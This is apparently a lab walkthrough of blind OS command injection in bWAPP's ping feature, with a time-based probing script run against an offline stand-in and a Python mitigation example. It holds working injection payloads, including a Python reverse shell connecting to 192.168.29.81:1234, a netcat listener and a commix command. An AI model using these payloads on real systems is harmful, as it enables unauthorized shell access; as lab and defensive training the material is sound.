In this walkthrough, we will be going through the OS Command Injection (Blind) vulnerability section from bWAPP Labs. We will be exploring and exploiting Blind OS Command Injection in the ping (IP address) functionality and learn how applications are affected by it. So, let's get started with the hacking without any delay.
Security: Low
- Setting the security level to Low.
- The application has an input box which is used to ping an IP address. On intercepting the request via Burp Suite, we can see that it sends a POST request to the commandi_blind.php file with our supplied value in the target parameter. As this is a Blind OS command injection challenge, the application does not return the output of the command, so we have to infer execution from a side effect such as a time delay.
- I used the below payload to test the Blind command injection and it worked: the response was delayed by 5 seconds, matching the sleep value in our input. To rule out ordinary network latency, compare against the response time of a plain 127.0.0.1 request, and repeat with a longer sleep (for example 10 seconds) to confirm the delay scales with the payload.
127.0.0.1 | sleep 5
- Let's exploit the server and get a reverse shell using the below payload. Start a listener on the attacking machine first (for example nc -lvnp 1234 on 192.168.29.81); the payload connects back to that address and port and attaches /bin/sh to the socket. It relies on a python interpreter being available on the target.
127.0.0.1 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.29.81",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Security: Medium
- Setting the security level to Medium.
- I used the same payload to test the Blind command injection and it worked: the response was again delayed by 5 seconds, matching the sleep value in our input, which tells us the | separator is not filtered at this level.
127.0.0.1 | sleep 5
- I tried various payloads but was unable to get the reverse shell manually, so I used commix and it worked. The reason the manual attempt fails is that the Medium level only deletes the & and ; characters from the input, and the Python one-liner above depends on ; to separate its statements, so it reaches the shell mangled even though the | separator itself survives; a payload that contains neither character is needed, which commix manages on its own.
python3 commix.py -u "http://localhost/commandi_blind.php" --cookie="PHPSESSID=k6h767b8c040u52pi5hc0ilai1; security_level=1" --data="target=127.0.0.1&form=submit"
Security: High
- Setting the security level to High.
- I used the below payloads, however none of them worked, and exploitation with commix did not work either. At this level bWAPP passes the input through PHP's escapeshellcmd(), which prefixes every shell metacharacter (including ; & | and backticks) with a backslash, so the separators reach the shell as literal characters rather than command terminators. Note also that || is a weak probe even at the lower levels: its right-hand side only runs when the ping fails, and a ping of 127.0.0.1 normally succeeds.
127.0.0.1 ; sleep 5
127.0.0.1 & sleep 5
127.0.0.1 | sleep 5
127.0.0.1 || sleep 5
127.0.0.1 && sleep 5
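As an added example (not code from the original walkthrough or from bWAPP), the following Python script automates the time-based check used at each of the three levels above and, since the lab cannot be reached offline, runs it against a small stand-in that applies the three filters as I recall them from bWAPP's functions_external.php (Low: none; Medium: delete & and ;; High: escapeshellcmd). The escapeshellcmd model, the shell-splitting model and the assumption that ping 127.0.0.1 exits 0 are simplifications of mine; the URL and cookie passed to http_sender are placeholders. Running it shows which separators survive each level and why the Python reverse shell, which needs ; between its statements, is mangled at Medium.

```python
import time
import urllib.parse
import urllib.request

# Separators tried in the walkthrough, in the same order.
SEPARATORS = [";", "&", "|", "||", "&&"]


def http_sender(url, cookie):
    """Build send(payload) -> elapsed seconds against a real bWAPP instance.
    Form fields match the walkthrough's commix command (target=...&form=submit)."""
    def send(payload):
        body = urllib.parse.urlencode({"target": payload, "form": "submit"}).encode()
        req = urllib.request.Request(url, data=body, headers={"Cookie": cookie})
        start = time.monotonic()
        with urllib.request.urlopen(req, timeout=60) as resp:
            resp.read()  # the page never shows command output; only timing matters
        return time.monotonic() - start
    return send


def probe(send, base="127.0.0.1", sleep_seconds=5, slack=1.0):
    """For each separator, report whether '<base> <sep> sleep N' delayed the
    response by about N seconds more than a plain '<base>' request."""
    baseline = send(base)
    results = {}
    for sep in SEPARATORS:
        elapsed = send(f"{base} {sep} sleep {sleep_seconds}")
        results[sep] = (elapsed - baseline) >= (sleep_seconds - slack)
    return results


# --- Offline stand-in for the target.  Filters reconstructed from memory of
# --- bWAPP's functions_external.php (assumption), not copied from it.

def filter_low(target):
    return target                                    # no filtering at all


def filter_medium(target):
    return target.replace("&", "").replace(";", "")  # only '&' and ';' are deleted


_META = set("#&;`|*?~<>^()[]{}$\\\n\xff")


def filter_high(target):
    # Simplified model of PHP's escapeshellcmd(): backslash before each
    # metacharacter (ignores PHP's special handling of unpaired quotes).
    return "".join("\\" + ch if ch in _META else ch for ch in target)


FILTERS = {"low": filter_low, "medium": filter_medium, "high": filter_high}


def shell_seconds(cmdline):
    """Tiny model of sh splitting a line on ; & | || && and of how long the
    resulting commands take.  Only 'sleep N' costs time; every other command
    (the ping of 127.0.0.1) is assumed to succeed instantly with status 0."""
    segments, current, op, i = [], "", None, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "\\" and i + 1 < len(cmdline):      # escaped: literal, not an operator
            current += cmdline[i + 1]
            i += 2
        elif ch in ";&|":
            segments.append((op, current))
            current = ""
            if ch != ";" and i + 1 < len(cmdline) and cmdline[i + 1] == ch:
                op, i = ch * 2, i + 2                  # '||' or '&&'
            else:
                op, i = ch, i + 1
        else:
            current += ch
            i += 1
    segments.append((op, current))

    total, status = 0.0, 0
    for op, text in segments:
        if (op == "||" and status == 0) or (op == "&&" and status != 0):
            continue                                   # short-circuited by the shell
        words = text.split()
        if len(words) >= 2 and words[0] == "sleep":
            total += float(words[1])
        status = 0
    return total


def simulated_sender(level):
    """send(payload) for the offline stand-in at security level low/medium/high."""
    def send(payload):
        return 0.05 + shell_seconds("ping -c 1 " + FILTERS[level](payload))
    return send


if __name__ == "__main__":
    for level in FILTERS:
        print(level, probe(simulated_sender(level)))
    # Why the Python reverse shell breaks at Medium: its ';' separators vanish.
    print(filter_medium("python -c 'import os,socket;s=socket.socket()'"))
    # Against a live lab (not run here):
    # probe(http_sender("http://localhost/commandi_blind.php",
    #                   "PHPSESSID=<from Burp>; security_level=0"))
```

Against a live lab, swap simulated_sender(level) for http_sender(url, cookie) with the PHPSESSID and security_level cookie taken from Burp; keep slack well below sleep_seconds and re-run with a longer sleep before trusting a single hit.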
Conclusion:
So, we have finally completed all the security levels for the bWAPP OS Command Injection (Blind) vulnerability. We looked into how the application is set up at each level and how the security controls can be bypassed: Low applies no filtering, Medium only deletes & and ; so the | separator still works, and High escapes every shell metacharacter so no separator gets through. Blind OS Command Injection can be mitigated by avoiding OS commands from application-layer code altogether and, where a command is unavoidable, by strictly validating the user input (for a ping feature, accepting only a syntactically valid IP address) and passing it as a single argument rather than splicing it into a shell string. On that note, I will take your leave and will meet you in the next one with another bWAPP vulnerability writeup, till then "Keep Hacking".
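To make the mitigation concrete, here is an added example in Python (not bWAPP's PHP and not the author's code) of the vulnerable construction beside two hardened forms: quoting the value as one argument (shlex.quote, the Python counterpart of PHP's escapeshellarg) when a shell string cannot be avoided, and, preferably, validating the value as an IPv4 literal and executing ping with an argument list and no shell. The function names are mine.

```python
import ipaddress
import shlex
import subprocess


def vulnerable_command(target):
    """What the vulnerable handler hands to the shell: raw concatenation, so a
    separator inside `target` ends the ping command and starts the attacker's."""
    return "ping -c 1 " + target


def quoted_command(target):
    """If a shell string is unavoidable, quote the value as ONE argument so the
    shell sees '127.0.0.1 | sleep 5' as a single (bad) hostname, not a pipeline."""
    return "ping -c 1 " + shlex.quote(target)


def hardened_argv(target):
    """Preferred fix: reject anything that is not a single IPv4 literal and pass
    it as its own argv element, so no shell ever parses it."""
    try:
        ip = ipaddress.IPv4Address(target.strip())
    except ValueError:
        raise ValueError("target must be a single IPv4 address") from None
    return ["ping", "-c", "1", str(ip)]


def is_valid_target(target):
    """True when hardened_argv() would accept the value."""
    try:
        hardened_argv(target)
        return True
    except ValueError:
        return False


def blind_ping(target):
    """Run the hardened command without a shell and return only success or
    failure, mirroring the lab's 'result will not be displayed' behaviour."""
    proc = subprocess.run(hardened_argv(target), capture_output=True, timeout=15)
    return proc.returncode == 0


if __name__ == "__main__":
    payload = "127.0.0.1 | sleep 5"                 # the walkthrough's probe
    print(vulnerable_command(payload))              # ping -c 1 127.0.0.1 | sleep 5
    print(quoted_command(payload))                  # ping -c 1 '127.0.0.1 | sleep 5'
    print(is_valid_target(payload))                 # False
    print(hardened_argv("127.0.0.1"))               # ['ping', '-c', '1', '127.0.0.1']
```

The validation-plus-argv form is the one to ship: it removes the shell from the picture entirely, and the IP check means the only thing ping ever receives is an address, which also closes off argument-injection tricks such as a value starting with a dash.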